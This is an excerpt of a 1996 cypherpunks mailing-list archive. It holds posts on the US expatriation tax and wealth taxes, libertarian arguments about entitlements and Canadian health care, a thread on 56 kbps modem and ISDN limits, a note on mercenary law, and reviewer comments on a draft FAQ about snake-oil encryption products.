or may have visions of taking their stock certificates and simply moving to
Anguilla :-}.)

If this trend continues--more money in equities and investments, and a
higher overall valuation (as prices are driven up by more folks getting in,
and by other conventional factors)--the government would seem to have two
main choices:

1. Start taxing the overall wealth, e.g., 5% per year.

2. Reduce capital gains taxes so that the "locked assets" will at least
come to market and generate some income from capital gains, even if at a
reduced level.


At 6:38 PM 9/17/96, Duncan Frissell wrote:

>Note too the recent article in the Economist about how European firms are
>raising capital in the UK and the US because it is available there in
>private pension savings while European government retirement systems suck
>loads of capital out of the system leaving nothing but massive government
>debts.

The flow of capital into equities is truly astounding. Some fraction of
Americans are really preparing themselves well for retirement, emergencies,
vacations, etc. Of course, a distressing fraction of Americans have no
savings plans to speak of, and will essentially have no money as they age.

Needless to say, I despise the idea of a "wealth tax," and I can see
various loopholes and workarounds. I'd also expect a lot of folks to simply
move out of the country if this were to happen.

In the current political climate, I'd say the chance of a wealth tax in the
next several years is small. Ditto for a capital gains tax rate reduction.
As with selling assets, "doing nothing" is often the likeliest path.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Tim May)
Date: Wed, 18 Sep 1996 10:32:42 +0800
To: cypherpunks@toad.com
Subject: The Expat Tax Is Law - The Door Is Now Closed!
Message-ID: <199609171211.FAA02724@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain



I'm forwarding this message to the list, as it relates to several themes
we've been discussing recently.

The imposition of draconian taxation policies effectively says that the
U.S. is now doing what the Soviet Union did to emigrants: demand that they
"pay back" various costs the government claimed they had incurred. Here,
the U.S. is telling would-be expats that they cannot take their property
with them, that they must effectively "escrow" (there's that horrid word
again) their assets in a form and place that the tax collector can access,
even if they no longer live in the United States and no longer use
services, and even if they had paid their full taxes on income while they
_were_  in the U.S.

It makes me want to just put my stock certificates in my luggage and just
drive on down to Mexico and cross the border (no border checks) and go
from there to some safer haven.

(However, I imagine the Feds can effectively block sales of my stock--the
stock is still formally only an accounting entry, as stock certificates
are not "bearer instruments." I could probably relocate to a foreign haven
and sell the assets before the IRS would even notice...unless they
computerize. I suspect this is coming.)

Anyway, here's the article:


> From: taxhaven@ix.netcom.com(Adam Starchild)
> Newsgroups: alt.privacy
> Subject: The Expat Tax Is Law - The Door Is Now Closed!
> Date: 17 Sep 1996 01:30:43 GMT
> Message-ID: <51kv03$d82@dfw-ixnews5.ix.netcom.com>

> 
>          The Expat Tax Is Law - The Door Is Now Closed!
> 
>                                by
> 
>                          Marc M. Harris
> 
>      After last year's failed attempt to pass an American
> expatriate tax, the U.S. Treasury Department succeeded in
> sneaking the provisions into the miscellaneous revenue positions
> of the recently passed Health Coverage Availability and
> Affordability Act of 1996.  Given the failure of their high
> profile campaign last year, the Treasury Department switched
> strategies this year and undertook one of stealth.  While the
> press was talking about tax-deductible contributions to medical
> savings accounts (MSAs), provisions tightening the expatriation
> tax rules were implemented.  Foreign grantor trust rules were
> also tightened under the law.
>      In order to provide the health insurance and care benefits
> provided under the law, a separate tax title adds certain revenue
> raising provisions.  In general, these revenue offsets add
> provisions aimed at making certain the United States get their
> fair share plus some when U.S. citizens and permanent residents
> expatriate.  In short, Uncle Sam would like to tell its
> expatriates that they earned their money from the United States,
> not in it.
>      A review of selected sections of the Congressional Record
> provides some additional insight into the thinking behind these
> new provisions.
> 
>           "It has come to the attention of Congress that some
>      very wealthy individuals have been relinquishing their
>      citizenship to avoid U.S. income, estate and gift tax.  The
>      bill does not want to discourage citizens from exercising
>      their right to expatriate, but does not want to provide a
>      tax incentive for such an action..."
> 
>      If Congress truly wanted to eliminate the incentive for
> expatriation, it might be better to eliminate high taxation and
> put an end to the litigation crisis rather than creating another
> layer of government regulation and bureaucracy.
> 
>           "Congress believes the changes are consistent with
>      existing tax treaties in conferring a tax credit for taxes
>      paid in the foreign country, and to the extent they are
>      inconsistent, the Treasury Department will re-negotiate the
>      treaties to account for the changes.  The new provisions
>      take precedence over any treaties..."
> 
>      To make certain that other countries will not benefit from
> America's brain drain, the United States will once again embark
> on a campaign to bully other nations into accepting America's
> oppressive system of taxation and regulation.
> 
>           "This bill would subject former citizens to the
>      expatriation provisions with no inquiry into their motive
>      and requires individuals who exchange property that would
>      otherwise be exempt from U.S. taxation as foreign source
>      income must immediately recognize U.S. source income on any
>      gain from such a transaction.  The Secretary is authorized
>      to issue regulations to treat removal of tangible property
>      from the U.S. and other conversions to foreign source
>      income.  For example, any income from stock transferred to a
>      foreign source, such as dividends, would be converted to
>      U.S. source and immediately taxed..."
> 
>      Logic dictates that if this tax were to approach 100%, it
> would look quite similar to currency controls and foreign
> investment prohibitions.  Since it only goes about half of the
> way, we can assume that we are 50% down the road toward American
> currency and foreign investment controls.
> 
>           "A new information reporting requirement has been added
>      requiring former citizens and long-term residents to
>      complete information reporting at the time of
>      expatriation..."
> 
>      Just to make certain that no one escapes from the United
> States without leaving all their wealth behind, the new
> information reporting requirements will make certain that the
> Treasury Department always knows where your assets are placed. 
> Of course, if you fail to report, civil and criminal sanctions
> will apply.  The new treaty negotiations will most likely include
> provisions to extradite those "expat tax evaders" back home for
> their "criminal act" of leaving a country that was once known as
> the home of the free.  Our sources at the Internal Revenue
> Service tell us this treaty provision will be known as the Hotel
> California provision -- you can check out, buy you can never
> leave.
> 
>           "The bill also requires that a U.S. person that
>      receives a distribution from a trust must report that to the
>      Service..."
> 
>      Now Uncle Sam is not only seeking to penalize those patriots
> that have placed their funds out of harm's way, but now the
> potential recipients of those receipts.  If the logic of current
> money laundering statutes apply as they do in most tax cases, the
> bank that accepts the cashing of the beneficiary's distribution
> check from a foreign trust will be a co-conspirator in this
> "unpatriotic" affair.
> 
>           "Effective for transfers made after February 6, 1995,
>      if a non-resident alien becomes a resident within five years
>      of transferring property to a foreign trust, the transferor
>      will be considered to have transferred the property on the
>      date he became a resident..."
> 
>      The Statue of Liberty stands as America's great symbol of
> open immigration with its famous inscription "give us your tired
> and poor."  With this provision, any person who hopes to emigrate
> to the United States will definitely become tired of complying
> with U.S. regulations and poor after he complies with them.
> 
>           "If a U.S. person receives more than $10,000 worth of
>      gifts from one foreign person during any tax year, he must
>      file a report with the Service.  If he fails to file a
>      report, the Service has the sole discretion to determine the
>      taxation of the property received by the U.S. person and the
>      person is liable for a penalty of 5 percent of the value of
>      the gift for each month he fails to file a report..."
> 
>      Currency controls and foreign investment restrictions work
> both ways.  Not only will governments prevent you from sending
> your money out, but they will also prevent you from sending your
> money in without their fair share plus some.
> 
>           "The Service has the power to prescribe regulations to
>      prevent the avoidance of the Estate, Trust and Beneficiary
>      part of the Code..."
> 
>      This provision is known as an Abusive Transaction provision. 
> It is commonly referred to by international human rights
> organizations as the arbitrary and capricious application of
> laws.
> 
>           "Once the Secretary of the Treasury establishes a
>      reasonable belief that the expatriate's loss of U.S.
>      citizenship would result in a substantial reduction in
>      estate, inheritance, legacy, and succession taxes, the
>      burden of proving that one of the principal purposes of the
>      loss of U.S. citizenship was not avoidance of U.S. income or
>      estate tax is on the executor of the decedent's estate..."
> 
>      If these provisions were making you feel a bit suicidal,
> please forget it.  Uncle Sam is not only going to pursue you to
> the grave, but also your executors and heirs.
> 
>      Other items in the Congressional Record provide an even
> greater insight into Washington's motivations:
> 
>           "Because U.S. citizens who retain their citizenship are
>      subject to income tax on accrued appreciation when they
>      dispose of their assets, as well as estate tax on the full
>      value of assets that are held until death, the Committee
>      believes it fair and equitable to tax expatriates on the
>      appreciation in their assets when they relinquish their U.S.
>      citizenship.  The Committee believes that an exception from
>      the expatriation tax should be provided for individuals
>      whose income and net worth are relatively modest..."
> 
>      If you are poor, you may leave; however, if you were a
> productive American in the United States that no longer exists,
> you must stay and pay or leave behind the fruits of your
> productivity.  America's Second Civil War has begun and it is
> known as Class Warfare.
> 
>           "Exceptions from the expatriation tax are provided for
>      individuals.  (An) exception applies to a U.S. citizen who
>      relinquishes citizenship before reaching age 18-1/2,
>      provided that the individual was a resident of the United
>      States for no more than 5 taxable years before such
>      relinquishment..."
> 
>      Since one cannot renounce their American citizenship prior
> to their 18th birthday, the children of an American resident
> overseas have only 6 months to renounce their citizenship and
> avoid the application of these laws.  Ho many 18 year olds are
> capable of making this type of decision?
> 
>           "Under the provision, an individual is permitted to
>      elect to defer payment of the expatriation tax with respect
>      to the deemed sale of any property.  Under this election,
>      the expatriation tax with respect to a particular property,
>      plus interest thereon, is due when the property is
>      subsequently disposed of.  In order to elect deferral of the
>      expatriation tax, the individual is required to provide
>      adequate security to ensure that the deferred expatriation
>      tax and interest ultimately will be paid...  In the event
>      that the security provided with respect to a particular
>      property subsequently becomes inadequate and the individual
>      fails to correct such situation, the deferred expatriation
>      tax and interest with respect to such property becomes due. 
>      As a further condition to making this election, the
>      individual is required to consent to the waiver of any
>      treaty rights that would preclude the collection of the
>      expatriation tax."
> 
>      Only in Congress could one dream of a law that requires its
> former citizens to waive their rights in a foreign country in
> order to escape from the political, social, and economic tyranny
> of the United States.
> 
>           "Under the provision, special rules apply to trust
>      interests held by the individual at the time of
>      relinquishment of citizenship or termination of residency. 
>      In addition, an individual who holds (or who is treated as
>      holding) a trust interest at the time of relinquishment of
>      citizenship or termination of residency is required to
>      disclose on his or her tax return the methodology used to
>      determine his or her interest in the trust, and whether such
>      individual knows (or has reason to know) that any other
>      beneficiary of the trust uses a different method..."
> 
>      The latter provision is known as the "Stool Pigeon" clause -
> - you are required to turn your fellow beneficiaries over to the
> Internal Revenue Service.  Similar laws existed in Nazi Germany
> that encouraged children to turn their parents and neighbors over
> to the authorities.
> 
>           "If the individual holds an interest in a trust that is
>      not a qualified trust, a special rule applies for purposes
>      of determining the amount of the expatriation tax due with
>      respect to such trust interest.  Such separate trust is
>      treated as having sold its assets as of the date of
>      relinquishment or citizenship or termination of residency
>      and having distributed all proceeds to the individual, and
>      the individual is treated as having recontributed such
>      proceeds to the trust.  The individual is subject to the
>      expatriation tax with respect to any net income or gain
>      arising from the deemed distribution from the trust.  A
>      beneficiary's interest in a non-qualified trust is the basis
>      of all facts and circumstances.  If the individual has an
>      interest in a qualified trust, a different set of rules
>      applies.  In determining this amount, all contingent and
>      discretionary interests are resolved in the individual's
>      favor (i.e. the individual is allocated the maximum amount
>      that he or she potentially could receive under the terms of
>      the trust instrument)..."
> 
>      The United States is quite generous in calculating the tax
> based on the maximum possible distribution.  In their arrogance,
> it appears that the law does not detail how to recover the excess
> tax if the maximum level is never reached.  Alternatively,
> Congress never intended for former Americans to comply with this
> law.
> 
>           "If the individual does not agree to such a waiver of
>      treaty rights, the tax with respect to distributions to the
>      individual is imposed on the trust, the trustee is
>      personally liable therefor, and any other beneficiary of the
>      trust will have a right of contribution against such
>      individual with respect to such tax."
> 
>      Based on the above, no foreign financial institution with
> offices or business in the United States would accept the
> trusteeship of an American's assets.
> 
>           "Under the provision, an individual is permitted to
>      make an irrevocable election to continue to be taxed as a
>      U.S. citizen with respect to all property that otherwise is
>      covered by the expatriation tax.  This election is an "all-
>      or-nothing" election;..."
> 
>      Congress is quite generous with this provision in allowing
> expatriating Americans to continue being chased by tax collectors
> for the rest of their lives overseas.
> 
>           "Under the provision, an individual is treated as
>      having relinquished U.S. citizenship on the date that the
>      individual first makes known to a U.S. government or
>      consular officer his or her intention to relinquish U.S.
>      citizenship...  A U.S. citizen who furnishes to the State
>      Department a signed statement of voluntary relinquishment of
>      U.S. nationality, confirming the performance of an
>      expatriating act with the requisite intent to relinquish his
>      or her citizenship is treated as having relinquished his or
>      her citizenship on the date the statement is so furnished
>      (regardless of when the expatriating act was performed),
>      provided that the voluntary relinquishment is later
>      confirmed by the issuance of a CLN (Certificate of Loss of
>      Nationality).  If neither of these circumstances exist, the
>      individual is treated as having relinquished citizenship on
>      the date a CLN is issued or a certificate of naturalization
>      is cancelled.  The date of relinquishment of citizenship
>      determined under the provision applies for all tax
>      purposes..."
> 
>      Based on this provision, almost any American who now wishes
> to undertake the expatriation route will be subject to the tax. 
> In short, the door has closed for most Americans.
> 
>           "Under the provision, the exclusion from income does
>      not apply to the value of any property received by gift or
>      inheritance from an individual who was subject to the
>      expatriation tax.  Accordingly, a U.S. taxpayer who receives
>      a gift or inheritance from such an individual is required to
>      include the value of such gift or inheritance in gross
>      income and is subject to U.S. income tax on such amount..."
> 
>      This implies that if an American expatriate sends funds back
> to support his aging parents, his parents will need to treat
> these gifts as taxable income.  If the parents fail to report
> these amounts, they could also suffer civil and criminal
> penalties associated with tax evasion.
> 
>           "Under the provision, an individual who relinquishes
>      citizenship or terminates residency is required to provide a
>      statement which includes the individual's social security
>      number, forwarding foreign address, new country of residence
>      and citizenship and, in the case of individuals with a net
>      worth of at least $500,000, a balance sheet..."
> 
>      Given the desire to obtain balance sheets from expatriating
> Americans, it is only a matter of time before the IRS requires
> the inclusion of personal balance sheets of individual taxpayers
> with their Form 1040s or at least those they suspect might wish
> to expatriate.
> 
>           "In the case of a former citizen, such statement is due
>      not later than the date the individual's citizenship is
>      treated as relinquished and is provided to the State
>      Department..."
> 
>      In short, this means that you cannot obtain your certificate
> of loss of nationality without providing the information to the
> United States government.
> 
>           "Further, the provision requires the Secretary of the
>      Treasury to publish in the Federal Register the names of all
>      former U.S. citizens with respect to whom it receives the
>      required statements or whose names it receives under the
>      foregoing information-sharing provisions..."
> 
>      Now your friends and neighbors can know that you have
> expatriated.  Although Congress respects the right of Americans
> to expatriate, it will publish your name in the federal register
> as if expatriation were a criminal act.
> 
>           "The provision directs the Treasury Department to
>      undertake a study on the tax compliance of U.S. citizens and
>      green-card holders residing outside the United States and to
>      make recommendations regarding the improvement of such
>      compliance.  The findings of such study and such
>      recommendations are required to be reported to the House
>      Committee on Ways and Means and the Senate Committee on
>      Finance within 90 days of the date of enactment..."
> 
>      Uncle Sam has awoken to the fact that most Americans living
> overseas are the most likely individuals to expatriate and as a
> result, they are gearing up to create a machine to attack them as
> well.
> 
>           The provision is effective for U.S. citizens whose date
>      of relinquishment of citizenship (as determined under the
>      provision occurred on or after February 6, 1995.  U.S.
>      citizens who committed an expatriating act with the
>      requisite intent to relinquish their U.S. citizenship prior
>      to February 6, 1995, but whose date of relinquishment of
>      citizenship (as determined under the provision) does not
>      occur until after such date, are subject to the expatriation
>      tax..."
> 
>      This means that if you have not already relinquished your
> citizenship or have only done so recently, you are subject to the
> expat tax.  The door has closed, but not completely. 
> 
>                         About the Author
> 
>      Marc M. Harris is a certified public accountant and
> president of The Harris Organization.  He has already developed a
> strategy for legally avoiding the expat tax, which he discusses
> only in personal appointments.  
> 
>                 Copyright 1996 by Marc M. Harris
> 
> -----------------------------------------------------------------
> 
> Posted by Adam Starchild
>      The Offshore Entrepreneur at http://www.au.com/offshore

-- 
Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,  
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets, 
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Tue, 17 Sep 1996 17:44:38 +0800
To: cypherpunks@toad.com
Subject: Re: Workers Paradise. /Political rant.
In-Reply-To: <Pine.SUN.3.94.960916125640.11930A-100000@polaris>
Message-ID: <199609170532.HAA03260@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:

> > > The thing about _traditional_ charity, of the religious or community sort,
> > > was that it was not treated as an "entitlement," as something the 
> > > resentful masses could "demand" as part of their "human rights."
> > 
> >    There's no substantial difference between their resentful whining about
> > their rights
> 
> Such as the "right" to health insurance, the "right" to free checks for
> sitting on one's chair, the "right" to be treated preferentially as
> equally qualified non-minorities applying to the same job, the "right" to
> housing, the "right" to free education, the "right" to be paid three times
> what your labor is worth in the lowest bracket jobs.

   I wasn't surprised when Attilla flogged a cartoon liberal in responding
to me, but I'm quite surprised you have. I didn't produce or defend a
litany of "rights," I pointed out that Tim is resentful and whines.

> > and your resentful whining about your rights
> 
> The right to personal property.

   Malapropos.

> Beginning to get the picture?

   I've had it all along.

> All of the former were created in the last 60 years out of whole cloth
> more as "revolution insurance" than anything else.  They are rights
> because someone said they were, not because they are well or logically
> grounded.

   Absolutely.

> > - except maybe that you whine more.
> 
> I should hope he does.

   Why?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Tue, 17 Sep 1996 17:27:37 +0800
To: cypherpunks@toad.com
Subject: Re: 56 kbps modems
Message-ID: <9609170612.AA21839@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Tue Sep 17 08:09:26 1996
> 
> 
> 
> On Mon, 16 Sep 1996, Jay Gairson wrote:
> 
> > Speaking of ISDN, how many people, can afford to have a personal ISDN
> > line in there house?  And then afford to connect to something/someone
> > else on a next to permanent basis monthly?
> 
> No problem here. My ISDN bill is a small fraction of my regular phone
>  bill.
> 
In Switzerland you pay 25 CHF/month for a normal phoneline and 50 CHF/month 
for an ISDN line (but you get two channels), so basically here it doesn't 
matter, which technologie you choose. (BTW, usage charge - by the seconds - 
is the same for both)

:)
Remo Pini

- ------< fate favors the prepared mind >------
Remo Pini                        rp@rpini.com
PGP:  http://www.rpini.com/crypto/crypto.html
- ----< words are what reality is made of >----
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMj5AlxFhy5sz+bTpAQF2KQgAgzAfEFb/NDW+J1Ub77CsOhCA578hiGFJ
+0i2/yQApQFh4nztiAZoa2VeRlJV6TFcueF4wrGLmsZzw1j+jgo6SvW4ZRqZzfjC
Ob+1wF2SKskEWKoRkAz/+u+RcEAGiQObgTu4VbM59LSYMfX/oba9OurwClhqhg0y
/twMQ1BLUbFLqhZrruLO4rM1H2px+2FhWd6CP2jwEkiC/ghLPzGFPwcMoS1nSAfQ
PGCVbajLaLJalD31FjFT1Z48sA+waBkdCISe8DTx2LQfKq+WK2A1CRyNOlNZUZdj
ReaFBvciSTc8Eq01RmFZFOwoPvw7uxi8VpqE/xEBvq6v6UxrBF8xPQ==
=BEhi
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Tue, 17 Sep 1996 17:54:20 +0800
To: erp@digiforest.com
Subject: Re: 56 kbps modems
Message-ID: <9609170622.AA22206@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: erp@digiforest.com, cypherpunks@toad.com
Date: Tue Sep 17 08:20:07 1996
Argh, criticism!!!!! :-0

> > 3. NO transmission over a standard phoneline can have more than 3100
> > baud, because the frequency of anything transmitted over that line is
> > band limited to 300hz - 3400hz. (If you have ISDN it's not relevant
> > anyway, since you are fixed with 8000hz or 64000 bps->in europe :),
> > 56000 bps in usa)
> 
> Personally, by saying that no transmission on a standard phoneline can 
> have more than 3100 baud, is a statement saying that technology and 
> science, shall never advance, to a point where things are possible.
> If you remember right, just 10 or so years ago, we stated that 2400 baud
> was the highest possible baud, and we would never go over.  My modem, 
> running on a standard phone line, is a 28.8 USRobotics modem, with 
> the software, and hardware upgrades to a 3400 baud, I get on an average
> day anywhere from 3500 to 3600 baud for send/receive.  On a bad day, I 
> only get 3100 to 3200.  SO I would say, that my phone lines, are cleaner
> than most eh?  And Yes, I am in the US.
> Speaking of ISDN, how many people, can afford to have a personal ISDN 
> line in there house?  And then afford to connect to something/someone 
> else on a next to permanent basis monthly?

Well, if your modems says to "hell with the switch", you can do a lot of 
things with frequencies. And since the filters in the switch are not that 
accurate, you *might* get away with 3400 hz, which I doubt. Now if your 
phonecompany for what reason ever supports more bandwidth, thats good for 
you, but try to get your 3600 baud = 3600 hz modem to be accepted by the 
FCC will pose a problem, since it states in the regulations, that a modem 
has to stick to the 300-3400 hz band limits.

> > 4. Most modern transmission schemes work with multiple bits per baud.
> > I.e. you transmit 10 bits in one baud if you have a 31000 bps modem.
> > the only limitation in transmission speed is the amount of binary
> > values you can pack into one baud. that on the other hand is limited by
> > the S/N (signal to noise) ratio of your line. If you have a noise of
> > 0.9%, you can't use more than 100 steps or you have ambiguous signals.
> > since people talk about 56000 bps modems (we tried 34000 modems here
> > and they couldn't produce more than 28800 on a very good connection)
> > that would mean, that you have to transmit 18 bits = 262144 (!)
> > distinguishable signal forms per baud.

> What about new ways of splitting the steps and baud more so that it
> shows less at a higher level....  Just a question..  Ahh well, I'm
> getting a page so I shall finish this now...  Answer appreciated..

Huh?


- ------< fate favors the prepared mind >------
Remo Pini                        rp@rpini.com
PGP:  http://www.rpini.com/crypto/crypto.html
- ----< words are what reality is made of >----
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMj5DGBFhy5sz+bTpAQFQtwf/diE965nL6MCKX4ikXDyda9hq4a4yGQmV
dxYHxD7ADCu32j+InC0FSCevO9Cjn5SoUhrHxsXHj/ZVaBEXRtJLX9g771FciBAz
dqq1kKVVoFOJZGUCLUoHSD56tAU2t8pwXHu0QdnJWSpTLj9BausXGGcLH8PEJlAG
5bi3WP4M95Np/8nXUbR/GHlHiVLULRzDCgRLgVfDYe5NHgft69wXB5S3PoD/QUul
ranoj1+4xk92M9SarPzcG8/gboR1EFVxgRdgLIi0zeyO+D0Ler648Btf6BgMdaSd
Cr+9mzn/KXmrxHS4t6IPt+ZmZiUhzZHCcuxKrkb1JDz7pP6czhytyA==
=0WaE
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craigw@dg.ce.com.au
Date: Tue, 17 Sep 1996 09:32:46 +0800
To: Gary Howland <gary@systemics.com>
Subject: Re: 56 kbps modems
Message-ID: <199609162239.IAA24591@mac.ce.com.au>
MIME-Version: 1.0
Content-Type: text/plain


     That I realize that baud and bit/sec are not the same, but I feel you would
 have a hard time getting a 56k modem to work on a line that does not 
support 28.8k fully, let alone 33.6k. A leased line (copper pair) 
from telstra only supports 9.6k and costs close to ISDN.
     When the telco reinstalls the literal tons of copper cable that 
we have lying underground for at least 20 years in some instances 
that connects the exchanges, and replaces this with optic fibre 
preferably,  or at least higher bandwidth co-ax, we will not have 28k 
even.
     In the states you have better lines and ISDN is far less 
expensive. For two B channels perminantly connected I have to pay 
about $2500/month in this country. Not many home users can pay this, 
thus they have to still use modems. With the lack of bandwidth to and 
from the exchanges, there is not a chance in hell a 56k modem will 
work in this country for many years.
(Australia - the lucky country...not in regards to bandwidth)


> As I am sure has been discussed at length before, baud does not equal
> bps.  AFAIK, V32bis is only 2400baud.


        ,'~``.              \|/              ,'``~.
        (-o=o-)            (@ @)            ,(-o=o-),
+--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+
|                                                              |
|   Soon, we may all be staring at our computers, wondering    |
|               whether they're staring back.                  |
|                                                              |
| [Network Admin For WPA Business Products.  aka doshai >;-) ] |
|    .oooO        http://pip.com.au/~doshai/      Oooo.        |
|    (   )   Oooo.                        .oooO   (   )        |
+-----\ (----(   )-------oooO-Oooo--------(   )--- ) /---------+
       \_)    ) /                          \ (    (_/
             (_/                            \_)
Key fingerprint = 2D F4 54 BB B4 EA F1 E7  B6 DE 48 92 FC 8D FF 49
Send a message with the subject "send pgp-key" for a copy of my key.
(if I want to give it to you)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dustbin Freedom Remailer <dustman@athensnet.com>
Date: Wed, 18 Sep 1996 01:42:26 +0800
To: cypherpunks@toad.com
Subject: RE: Workers Paradise. /Political rant.
Message-ID: <199609171255.IAA00172@godzilla.athensnet.com>
MIME-Version: 1.0
Content-Type: text/plain


jbugden@smtplink.alis.ca wrote:

>> By spreading the risk you minimize the cost.

<...>

>Canada has a single payer system

Translation: a more palatable term for "socialised medicine"

>and we spend about two thirds as much as the
>U.S. on health care as a percentage of G.N.P. We manage to insure all Canadians
>while about 35% of people in the U.S. have *no* health insurance.

So why in the world do those crazy Canadians keep coming here for medical care, when they can get it from your compassionate bureaucrats? What could be their compulsion to spend money they don't need to spend? Charitable impulses toward our impoverished medical profession?

BTW, looking at historical costs of medical care and the level of government involvement, it is safe to say that the US has too much socialism in our medical system right now, and that it what's making the best system (ours) so expensive when it would not be otherwise.

>Yes, the insurance premium is not optional.

True.

>Yes, it *is* cheaper.

*False.* It is cheaper for _SOME_, and more expensive for others (in terms of either money, or waiting with pain, or both) and has an _ultimately high cost [the death penalty] for still others, who are forced to wait for the "compassionate" bureaucrats [who naturally know more about what patients' bodies need than the patients do themselves] to give them permission to get medical care they would otherwise purchase before death.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michelle Thompson <mthompso@qualcomm.com>
Date: Wed, 18 Sep 1996 03:28:50 +0800
To: cypherpunks@toad.com
Subject: Re: Assassination Politics, was Kiddie porn on the Internet
Message-ID: <2.2.32.19960917161601.002ee52c@strange.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: kwheeler@intellinet.com
>Date: Tue, 17 Sep 1996 10:54:35 -0500
>X-Sender: kwheeler@intellinet.com
>To: Michelle Thompson <mthompso>
>Subject: Re: Assassination Politics, was Kiddie porn on the Internet

Interesting information from a friend of mine-

>An american can not serve for pay for a position in another military
>that could be filled by local populace.  I may have my jurisdiction 
>wrong tho, this could be an international law not a US law.  
>Basically, you can't go be a grunt or an assasin in another country, 
>because they can find their own, but one can, however, fly P-40 Warhawks
for >China in 1941 because there were no chinese planes/pilots.  Guys from
soldier >of fortune (tho they do volunteer work) could be hired as 'experts'
at >whatever, removing mines, etc...  It's very touchy.  But, the worst
thing about >it all, is that the geneva convention doesn't protect
mercenaries....so awful >things could be done to them, and the world
wouldn't see that as war crimes.
>
>-Keith

I believe that with the breakdown of the traditional sense of sovereignty,
mercenary activity, whether military or commercial in nature, will increase.
Engineering seems to be quite mercenary already, and very international.
Marketing and advertising, to a novice (me), seem to be going the same way. 

Hence my interest in cryptography. Data security is essential in
international engineering projects.

Michelle Thompson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gee <geeman@best.com>
Date: Wed, 18 Sep 1996 08:22:26 +0800
To: cmcurtin@research.megasoft.com
Subject: Snakeoil FAQ edit/comments
Message-ID: <323ED007.57D@best.com>
MIME-Version: 1.0
Content-Type: text/plain


Matt:

Thanks, and good work.
My comments are indicated by [your text] in brackets, my comments >>> set off by >>>'s.
To help separate, look for "-----------------------------"
--------------------------- snake-oil-faq ----------------------------

                           Snake-Oil Warning Signs
                        Encryption Software to Avoid
      $Id: snake-oil-faq.html,v 0.4 1996/09/16 13:52:26 cmcurtin Exp $
Distribution

Please do not distribute this beyond the circles of cryptographic competence
yet. This is an incomplete work-in-progress. Feedback is greatly
appreciated.

The Snake Oil FAQ is (to be) posted monthly to cypherpunks, sci.crypt,
alt.security, comp.security, and comp.infosystems. We're targeting those who
have influence over or direct involvement in the purchasing decisions of
computer security software and equipment in the corporate and academic
worlds, as well as individual users who wish to assert their privacy through
the use of good cryptography.

-----------------------------
>>> I wonder what a good assumption is about level-of-expertise.  I should think rather low, since a more experienced person will 
not be in as much need of the doc in the first place.  Think moderately-informed user: 
like the readers of InfoWorld, eh?  Given that, there are several places where 
knowledge of the subject is assumed that the real consumer of the FAQ doesn't have.  
-----------------------------


Disclaimer

All contributors' employers will no doubt disown any statements herein.
We're not speaking for anyone but ourselves, based on our own experiences,
etc., etc., etc. This is a general guideline, and as such, cannot be the
sole metric by which a security product is rated, since there can be
exceptions to any of these rules. 

-----------------------------
>>> Actually, I think there are some rules in here that there are no exceptions to.  Check; nothing comes immediately to mind tho.
-----------------------------



-----------------------------
[(But if you're looking at something that sounds familiar on several of the 
'things to watch out for,' you're probably dealing with snake oil. ]

>>> But if many of the items on the "Things to look out for" list seem to apply to a product, the product is very likely weak.
-----------------------------



-----------------------------
>From time to time, a reputable and decent vendor
will produce something that is actually quite good, but will use some
[braindead] marketing technique, so be aware of exceptions.

>>> "Braindead", eh, hmmmmm.  Too dignified  ;)-----------------------------



Every effort has been made to produce an accurate and useful document, but
the information contained herein is completely without warranty. If you find any errors, 
or wish to otherwise contribute, please contact the document keeper, 
C Matthew Curtin <cmcurtin@research.megasoft.com>


Introduction

Good cryptography is an excellent and necessary tool for almost anyone.
However, there is a multitude of products around. Many good cryptographic
products are available, both commercial (including shareware) and free.
However, there are also some extremely bad cryptographic products (known in
the field as "Snake Oil"), which not only fail do their job of providing
security, but are based on, and add to, the many misconceptions and
misunderstandings surrounding cryptography and security.

-----------------------------
>>> They also prey on the inexperience of the consumer, rely on the mystery and mystique of mathmatical-sounding jargon, to make poorly engineered products 
seem to be something they are not.
-----------------------------



Superficially, it is difficult for someone to distinguish the output of a
secure encryption utility from snake oil: both look garbled. The purpose of
this document is >>> to <<< present some obvious "red flags" [so that] >>> which <<< people 
unfamiliar with the nuts and bolts of cryptography can use as a guideline for 
